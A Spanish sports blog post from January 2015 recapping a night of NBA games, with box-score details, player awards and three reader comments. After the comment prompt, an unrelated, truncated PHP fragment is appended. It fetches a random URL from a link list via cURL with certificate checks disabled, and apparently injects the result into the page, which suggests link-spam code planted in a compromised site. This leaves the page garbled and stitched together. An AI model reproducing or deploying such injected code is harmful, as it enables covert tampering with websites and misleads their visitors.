La Crónica: ¿Y si Detroit gana el Anillo?

08 de January de 2015 por FranGuaita

Van siete. Y los Pistons no dejan de sonreír. Dallas es ya la última víctima del asombroso caso de la Motown. Además, Atlanta tumba al oso y sigue liderando el Este. 40 puntos de Klay Thompson ante Indiana y bombazo de Utah en el United Center. Trece partidos en otra madrugada asombrosa en la factoría NBA.

Pasen y lean.

svg_dallas

MAVERICKS 95 – PISTONS 108
Donde quiera que esté el límite de estos asombrosos Pistons tras el corte de Josh Smith, desde luego es mucho más allá de Texas. Horas después de fulminar a los actuales campeones de la NBA en San Antonio, Detroit siguió asombrando a la NBA con otra victoria en un pabellón históricamente complicado, el American Airlines Center de Dallas. Es la séptima victoria consecutiva de la franquicia dirigida por Stan Van Gundy, cuya reacción en las últimas semanas ya capitaliza buena parte de los debates de los analistas deportivos americanos. Su balance ya puede definirse como decoroso (12-23) y a tan solo tres victorias de Miami, último equipo que en este momento entraría en playoffs si concluyese la temporada regular. Dos jugadores merecen mención especial por su actuación en Dallas. Greg Monroe con números de MVP: 27 puntos, 18 rebotes y 6 asistencias. Y un invitado inesperado. Desde la segunda unidad, 26 puntos a cargo de DJ Augustin con una serie de 9/16 en tiros de campo y 4/5 en triples. Ya hay quien se pregunta si estos Pistons podrían repetir la hazaña de los Oakland Athletics de la MLB en 2002 que dieron origen a la película Moneyball con su racha de 20 triunfos consecutivos. Los guionistas de Hollywood se frotan las manos.

BULLS 77 – JAZZ 97
Sin ningún genero de dudas, uno de los bombazos de la madrugada. Y, muy probablemente, de todo el mes de enero. Al tiempo. Utah saltó la banca anoche ganando de 20 en el United Center. Fue una de esas noches en Chicago. El trío de bases/combos a las órdenes de Thibodeau no la hubiera metido ni en el mismísimo Oceano Atlántico. Derrick Rose, Kirk Hinrich y Aaron Brooks se combinaron para una pírrica serie de 6/31 en tiros de campo. Únicamente Jimmy Butler (16 puntos, 11 rebotes) y Pau Gasol (13 puntos, 6 rebotes) mantuvieron el tipo para los Bulls. La antítesis, los Jazz en estado puramente granítico concediendo menos de 20 puntos a su rival en cada uno de los tres primeros cuartos. Derrick Favors (20 puntos, 11 rebotes) y Rudy Gobert (11 puntos, 14 rebotes) dominaron el partido a su antojo desde la pintura. El tropiezo combinado con el triunfo de Atlanta ante Memphis sitúa a Chicago a tres victorias del liderato en la Conferencia Este.

HAWKS 96 – GRIZZLIES 86
Con absoluto merecimiento, Atlanta sigue siendo el mejor equipo del Este. Sexta victoria consecutiva en las últimas dos semanas y noveno triunfo sin derrota ante franquicias del salvaje Oeste. A medida que se aproxima el parón del All-Star, los Hawks ofrecen muestras permanentes de fiabilidad. La última ante Memphis, sólido aspirante al poder establecido en la Western. Jeff Teague fue el héroe de la madrugada en el Philips Arena. Con el partido empatado a 84, líderó el juego en estático de Atlanta para un parcial de 10-0 que resultó definitivo. El playmaker de Indianapolis finalizó el encuentro con 25 puntos y 6 asistencias, escoltado por los triples de Kyle Korver (4/9 para 14 puntos) y los 13 puntos de Pero Antic desde las profundidades de la segunda unidad a las ordenes de Mike Budenholzer. Marc Gasol, cumplidor sin más: 16 puntos y 7 rebotes ante el poderoso frontcourt de Atlanta. Los Grizzlies permanecen terceros en el oeste, a cinco victorias de Golden State.

CAVALIERS 93 – ROCKETS 105
Ausente LeBron y sin un center de garantías en los Cavaliers, la W para los Rockets era cuestión de tiempo. Houston impuso la lógica en el último periodo con un parcial de 19-32 para derrotar a Cleveland en uno de los enfrentamientos estelares de la madrugada NBA. Ocho puntos consecutivos de Corey Brewer y el dominio de Howard en el parcial definitivo con 9 puntos y 8 rebotes (17 puntos, 19 rebotes en total) acabaron con la resistencia de los Cavs, en los que Kyrie Irving brilló con 38 insuficientes puntos. James Harden flirteó con el triple doble (21 puntos, 7 rebotes, 9 asistencias), generando juego para la franquicia de Texas, que mantiene la quinta posición de la conferencia Oeste.

WARRIORS 117 – PACERS 102
Pese a la resistencia de Indiana durante los dos primeros cuartos, nadie escapa al poder demoledor de los Splash Brothers cuando tienen la noche. Que es casi siempre. Los 21 puntos y 15 asistencias de Stephen Curry merecerían todos los titulares de no ser por la asombrosa manita de Klay Thompson: 40 puntos con 14/25 en tiros de campo y 6/11 desde la línea de tres. Quinta victoria consecutiva de los Warriors, que mantienen el liderato de la Western.

KINGS 104 – THUNDER 83
Posiblemente, el peor partido de Oklahoma desde el retorno tras lesión de Kevin Durant y Russell Westbrook. Ya desde el primer cuarto (28-16), el Sleep Train Arena disfrutó de la mejor versión de Sacramento. La tónica no varió un ápice durante el resto de la madrugada. El electrónico en el inicio del cuarto periodo lo dice todo: 78-57. Buena parte de la responsabilidad de la derrota con estrépito de los Thunder descansa sobre los hombros de Westbrook: 3-19 en tiros de campo y 7 pérdidas de balón. Rudy Gay, a gran nivel en los Kings con 28 puntos y 9 rebotes.

CLIPPERS 114 – LAKERS 89
Con un par de datos entenderán rápidamente cómo fue el partido en el Staples Center. Dato número 1: Clippers llevaba 70 puntos al descanso. Dato número 2: Seis jugadores de Lakers finalizaron el partido con dobles figuras. Ninguno de ellos Kobe Bryant. La consecuencia, otra paliza del equipo de Doc Rivers a sus vecinos y compis de pabellón. El mejor de la noche, Blake Griffin: 27 puntos, 9 rebotes y 8 asistencias. ¿Quién dijo que lo fácil en Los Ángeles era ser de los Lakers?.

HORNETS 98 – PELICANS 94
Con un 2+1 digno de la factoría Disney, Kemba Walker provocó el éxtasis en el Time Warner Cable Arena y selló el triunfo de Charlotte ante New Orleans. A falta de 1.4 segundos y con el partido empatado a 94, el jugón forjado en las calles del Bronx se inventó un tiro brutal sacando además la falta personal de Jrue Holiday. En la última posesión para los Pelicans, Marvin Williams fue el más listo de la clase e impidió un último tiro de la franquicia de Louisiana, que inició el último cuarto tres arriba, pero no pudo mantener su ventaja. Además de decidir el partido, Kemba fue el máximo anotador de Charlotte con 31 puntos, únicamente superado por la enésima exhibición del hombre de la ceja. Anthony Davis firmó otro recital: 32 puntos, 12 rebotes y 4 tapones.

TIMBERWOLVES 111 – SUNS 113
Con mayor sufrimiento del previsto en el guión inicial, Phoenix rescató en la recta final un agónico triunfo en el Target Center que le permite seguir entre los elegidos en la Conferencia Oeste. Los Suns se dispararon hasta los 42 puntos en el último periodo para remontar la ventaja de Minnesota. 15 de esos 42 a cargo de Gerald Green, MVP de la noche en Phoenix aportando un total de 21 puntos desde el banquillo. Andrew Wiggins y Mo Williams se combinaron para 48 puntos para los Timberwolves, que siguen anclados en las cinco victorias en regular season.

WIZARDS 101 – KNICKS 91
Oficialmente, el proyecto encabezado por Phil Jackson y Derek Fisher en La Gran Manzana ya ha encadenado la peor racha de derrotas en los casi setenta años de historia de la franquicia. Trece consecutivas. Y 23 partidos perdidos de los últimos 24 disputados. Ante las ausencias ya conocidas de Carmelo Anthony y Stoudemire, Calderon llevó el peso de las operaciones en NY, con 17 puntos que fueron insuficientes para mitigar la solvencia de Washington en el Verizon Center. John Wall (18 puntos, 8 asistencias) y Nene Hilario (20 puntos con una serie de 8/13 en tiros de campo) fueron decisivos en el triunfo de los Wizards, el tercero de la franquicia capitalina ante los Knicks en esta regular season.

NUGGETS 93 – MAGIC 90
Ty Lawson evitó anoche otra debacle de los irregulares Nuggets en el Pepsi Center. Gracias a los 23 puntos del eléctrico base procedente de la Universidad de North Carolina, Denver suma su triunfo número 16 en regular season a costa de Orlando, inquilino del vagón de cola en el Este. En el primer partido tras el traspaso de Mozgov a Cleveland, JJ Hickson quiso enviar un mensaje al staff técnico de los Nuggets generando un doble doble (11 puntos, 10 rebotes) desde la segunda unidad.

SIXERS 77 – BUCKS 97
Con cinco jugadores en dobles figuras y viviendo por encima del 50% en tiros de campo, Milwaukee sigue en racha. Quinta victoria consecutiva de la franquicia de Wisconsin a costa de uno de los peores equipos de la liga, Philadelphia. Brandon Knight y Khris Middleton anotaron 18 puntos cada uno para liderar a los Bucks en el apartado de anotación. Pachulia puso el contrapunto perfecto en la pintura con un doble doble: 11 puntos y 12 rebotes.

NETS 81 – CELTICS 89
Pese a una desventaja de hasta once puntos en la primera mitad, Boston tiró del legendario orgullo celtic con el paso de los minutos para conseguir un meritorio triunfo en la pista de Brooklyn. Avery Bradley (21 puntos con una serie de 7/12 en tiros de campo) y Tyler Zeller (18 puntos, 6 rebotes, 4 asistencias) fueron los mejores jugadores del equipo dirigido por Brad Stevens. De poco sirvió el doble doble de Mason Plumlee (16 puntos, 12 rebotes) en el Barclays Center. La canción sigue siendo triste para los Nets.

PREMIOS

MVP: Triunvirato en lo más alto. Monstruosa actuación de Greg Monroe con 27 puntos, 18 rebotes y 6 asistencias; letal de Klay Thompson con 40 puntos, y completísima de Blake Griffin con 27 puntos, 9 rebotes, 8 asistencias y 3 robos. Hay para elegir.

Rookie: Otro partido más de Andrew Wiggins por encima de los 20 puntos. Ayer anotó 25 con un 10 de 16 en TC y además cogió 4 rebotes y robó 3 balones. Podemos destacar también los 14 puntos y 4 rebotes de Jordan Clarkson, que disfrutó de minutos en ausencia de Ronnie Price, y los 14 puntos, 6 rebotes y 3 robos de KJ McDaniels.

Sorpresa: Mo Williams fue el que más luchó para evitar la décimotercera derrota consecutiva de los Wolves. Acabó con 23 puntos y 11 asistencias. A Khris Middleton también le salieron las cosas muy bien. El de los Bucks anotó 18 puntos y 5 robos de balón.

Decepción: El partido de anoche de Russell Westbrook solo puede ser definido como trágico. 3 de 19 en tiros de campo y nada menos que 7 pérdidas. Un auténtico desastre. Derrick Rose se fue para casa con 7 puntos y un 3 de 15 en TC.

Esfuerzo en vano: Esta vez, los 32 puntos, 12 rebotes y 4 tapones de Anthony Davis no sirvieron para llevarse la victoria. Tampoco los 38 puntos de Kyrie Irving.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Nacho dice:
    #1

    Lo de los Pistons es la plasmación de que en basket, dos más dos no son cuatro. Van Gundy quería un equipo, y lo tenía no a falta de algún jugador, sino eliminando imperfecciones, por muy buena que fuera (y Josh Smith lo fue).
    Cierto que Drummond ya empezó a dar muestras de mejoría antes de la salida del ex Hawks, pero a él y a Monroe se les abrió el cielo.
    Ganas de verlos en acción, que todavía no lo he hecho.
    Creo que al bueno de Stan le dimos pal pelo con aquellos Magic, con el tiempo te das cuenta de lo que hizo, porque tampoco era equipo de finales áquel.
    Y sí, si se llevan el anillo… todos alabaremos esa chaqueta mal puesta, con la libretita y el boli en el bolsillo interior, las voces desencajadas tras tragos de cazalla, y se comerá sus palabras su hermano (ya se las debe estar comiendo,como casi todos nosotros)

      Citar

  2. Azabel dice:
    #2

    la dupla Monroe y Drummond siempre ilusiono, el primer año de Drummond este aun muy verde no pudieron compartir demasiado tiempo, y luego les cayo encima Smith, que si lo hubiesen rotado bien, podrian haber formado un trio envidiable, pero ya sabemos que Smtih la va de estrella y se cree un alero tirador, y de alli el problema

    con una dupla interior como Monroe y Drummond capaz que promediar entre ambos 40 puntos y 20 rebotes noche tras noche, si el perimetro acompaña, no veo muchos juegos interiores capaces de oponerseles

      Citar

  3. jhc dice:
    #3

    siguen de dulce mis Hawks, los GM han decidido vender el 100% querrán aprovechar el estado actual del equipo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>